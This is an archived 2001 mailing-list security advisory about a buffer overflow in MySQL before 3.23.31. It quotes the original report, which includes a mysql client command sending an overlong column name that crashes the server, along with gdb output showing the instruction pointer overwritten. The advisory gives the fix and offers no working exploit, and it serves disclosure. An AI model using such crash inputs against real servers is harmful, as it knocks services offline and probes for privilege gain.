The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Buffer overflow in MySQL < 3.23.31


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 18 Jan 2001 18:44:31 +0100
From: Nicolas GREGOIRE <[email protected]>
To: [email protected]
Subject: Buffer overflow in MySQL < 3.23.31

Hi,

all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
server and which seems to be exploitable (ie. 4141414 in eip)

Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)

Requirements :
You need a valid login/password to exploit this

Solution :
Upgrade to 3.23.31

Proof-of-concept code :
None

Credits :
I'm not the discoverer of this bug
The first public report was made by [email protected] via the MySQL
mailing-list
See the following mails for details

Regards,
Nicob

Here the original post to the MySQL mailing-list :

On Jan 12, Jo?o Gouveia wrote: > Hi, > > I believe i've found a problem in MySql. Here are some test's i've made in > 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't > debug it, just tested to see if crashes ).Confirmed up to latest 3.23 > On one terminal: > <quote> > spike:/var/mysql # /sbin/init.d/mysql start > Starting service MySQL. > Starting mysqld daemon with databases from /var/mysql > done > spike:/var/mysql # ></quote> > > On the other terminal: > <quote> > jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' > Enter password: > (hanged..^C) > </quote> > > On the first terminal i got: > <quote> > spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault > nohup > $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin > g "$@" >>$err_log 2>&1> > Number of processes running now: 0 > mysqld restarted on Fri Jan 12 07:10:54 WET 2001 > mysqld daemon ended > </quote> > > gdb shows the following: > <quote> > (gdb) run > Starting program: /usr/sbin/mysqld > [New Thread 16897 (manager thread)] > [New Thread 16891 (initial thread)] > [New Thread 16898] > /usr/sbin/mysqld: ready for connections > [New Thread 16916] > [Switching to Thread 16916] > > Program received signal SIGSEGV, Segmentation fault. > 0x41414141 in ?? () > (gdb) info all-registers > eax 0x1 1 > ecx 0x68 104 > edx 0x8166947 135686471 > ebx 0x41414141 1094795585 > esp 0xbf5ff408 0xbf5ff408 > ebp 0x41414141 0x41414141 > esi 0x41414141 1094795585 > edi 0x0 0 > eip 0x41414141 0x41414141 > eflags 0x10246 66118 > cs 0x23 35 > ss 0x2b 43 > ds 0x2b 43 > es 0x2b 43 > fs 0x0 0 > gs 0x0 0 > (gdb) > </quote> > > looks like a tipical overflow to me. > Please reply asap, at least to tell me i'me not seeing things. :-)> > Best regards, > > Joao Gouveia aka Tharbad. > > [email protected] Here the reponse to a email I send today to the MySQL list :
Sergei Golubchik (MySQL team) wrote : > > Hi! > > On Jan 18, Nicolas GREGOIRE wrote: > > Hi, > > > > Still not any info about the buffer-overflow discovered last week ? > > Shouldn't be fixed at the beginning of the week ? > > > > Please, dear MySQL team, give us info !! > > > > Regards, > > Nicob > > Fixed in latest release (3.23.31). > > Regards, > Sergei Here an part of the 3.23.30 to 3.23.31 diff :
+Changes in release 3.23.31 +-------------------------- + + * Fixed security bug in something (please upgrade if you are using a + earlier MySQL 3.23 version).

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру